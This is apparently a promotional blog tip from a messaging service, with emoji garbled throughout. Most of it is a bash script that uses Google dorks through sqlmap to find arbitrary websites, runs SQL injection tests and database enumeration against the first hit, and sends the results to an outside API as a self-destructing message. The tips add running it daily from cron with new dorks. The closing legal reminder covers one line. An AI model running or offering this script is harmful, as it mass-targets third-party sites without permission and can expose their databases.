๐ฌ HMAS Pro Tip
May 21, 2025โข477 words
๐๐ Dork-Based SQL Injection Recon with sqlmap + HMAS
๐ต๏ธโโ๏ธ Ready to go full hacker-mode with style? This guide shows how to combine Google dorking,
automated SQL injection testing using sqlmap, and HMAS send= or share= feature for stylized,
secure reporting โ without exceeding API limits.
๐ What This Script Does
- ๐ Uses a Google dork to discover vulnerable URLs.
- ๐ Runs
sqlmapagainst those URLs. - ๐งพ Compresses the output into a single message.
- ๐ค Sends the report using
send=(encrypted) orshare=(via email).
๐งพ Script: sqlmap_dork_report.sh
#!/bin/bash
// this script assumes you are using sqlmap.py
// if not please update the url
# === CONFIGURATION ===
API_KEY="your_api_key"
RECIPIENT_KEY="admin_api_key"
API_URL="https://carlostkd.ch/hmas/api.php"
USE_EMAIL=0 // set to 1 to send email
EMAIL_RECIPIENT="pentest@example.com"
DORK="$1"
# Path to local sqlmap.py fallback
LOCAL_SQLMAP="/path/to/sqlmap/sqlmap.py"
if [ -z "$DORK" ]; then
echo "Usage: $0 \"inurl:page.php?id= site:com\""
exit 1
fi
# === DETERMINE SQLMAP COMMAND ===
if command -v sqlmap &>/dev/null; then
SQLMAP_CMD="sqlmap"
elif [ -f "$LOCAL_SQLMAP" ]; then
SQLMAP_CMD="python3 $LOCAL_SQLMAP"
else
echo "[!] sqlmap not found. Please install it or set LOCAL_SQLMAP correctly."
exit 1
fi
echo "[*] Searching for target URL from dork: $DORK"
RAW_OUTPUT=$($SQLMAP_CMD -g "$DORK" --dbs --tamper=space2comment --random-agent --batch --flush-session --disable-coloring -v 0 2>/dev/null)
# === EXTRACT URL ===
FOUND_URL=$(echo "$RAW_OUTPUT" | grep -Eo 'http[s]?://[^ ]+' | head -n 1)
if [ -z "$FOUND_URL" ]; then
echo "[!] No valid target URL found from dork. Aborting."
exit 1
fi
echo "[+] Found URL: $FOUND_URL"
TMPFILE=$(mktemp)
# === RUN SQLMAP SCAN ===
echo "[*] Running sqlmap scan on: $FOUND_URL"
$SQLMAP_CMD -u "$FOUND_URL" --dbs --tamper=space2comment --random-agent --batch --level=2 --risk=1 --flush-session --disable-coloring > "$TMPFILE" 2>&1
wait
# === READ OUTPUT ===
if [ ! -s "$TMPFILE" ]; then
echo "[!] No output captured from sqlmap."
rm -f "$TMPFILE"
exit 1
fi
SCAN_OUTPUT=$(tail -n 40 "$TMPFILE")
rm -f "$TMPFILE"
# === BUILD AND ENCODE MESSAGE ===
HOST=$(hostname)
TIME=$(date)
MESSAGE="๐ SQLi Recon Report\n\nDork: $DORK\nTarget: $FOUND_URL\nHost: $HOST\nTime: $TIME\n\nSummary:\n$SCAN_OUTPUT"
ENCODED_MSG=$(echo -e "$MESSAGE" | jq -sRr @uri)
# === SEND TO API ===
if [ "$USE_EMAIL" -eq 1 ]; then
curl -G "$API_URL" \
--data-urlencode "share=$EMAIL_RECIPIENT" \
--data-urlencode "msg=SQLi_Report" \
--data-urlencode "apikey=$API_KEY"
else
curl -G "$API_URL" \
--data-urlencode "send=$ENCODED_MSG" \
--data-urlencode "rec=$RECIPIENT_KEY" \
--data-urlencode "selfdestruct=1" \
--data-urlencode "apikey=$API_KEY"
fi
๐งช Example Use
./sqlmap_dork_report.sh "inurl:post.php?id= site:com"
- Finds URLs using Google dorking
- Tests them for SQLi
- Sends results securely via your API
๐ฌ Hacker Tips
- ๐ฃ Use
selfdestruct=1to nuke the message after reading. - ๐ค Auto-run in cron with different dorks daily.
- ๐ฏ Include
chatstyle=panicordiffmode=corruptfor max drama.
๐งฏ Legal Reminder
Only test systems you own or have explicit permission to test.
This isnโt Hollywood โ itโs real and traceable.
๐ค Created by HMAS Team
Happy hunting, elite dorklord ๐ถ๏ธ